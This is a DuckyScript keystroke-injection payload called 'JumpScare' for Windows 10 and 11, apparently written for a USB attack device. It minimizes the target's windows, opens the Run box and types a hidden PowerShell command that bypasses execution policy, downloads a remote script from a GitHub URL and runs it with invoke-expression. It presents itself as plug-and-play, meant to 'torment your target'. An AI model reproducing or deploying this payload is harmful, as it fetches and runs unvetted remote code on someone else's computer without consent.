REM     Title: JumpScare

REM     Author: I am Jakoby

REM     Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details

REM     Target: Windows 10, 11

REM     --------------------------------------------------------------------------------------
REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM     --------------------------------------------------------------------------------------

REM     Start by minimizing all their current windows
GUI m
DELAY 500

REM     Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
ENTER
